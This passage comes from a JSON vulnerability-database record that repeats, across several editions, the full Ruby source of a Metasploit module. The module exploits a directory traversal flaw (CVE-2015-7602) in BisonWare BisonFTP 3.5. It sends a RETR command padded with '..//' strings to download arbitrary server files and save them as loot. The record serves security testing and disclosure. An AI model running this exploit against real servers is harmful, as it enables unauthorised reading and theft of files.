end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T15:56:21", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T17:50:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T17:50:51", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T17:50:51", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T21:50:59", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T21:50:59", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T21:50:59", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-07T22:12:56", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-07T22:12:56", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-07T22:12:56", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-08T00:12:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-08T00:12:12", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T08:27:52", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T08:27:52", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T10:30:37", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T10:30:37", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T22:29:59", "history": [], "viewCount": 0, "enchantments": 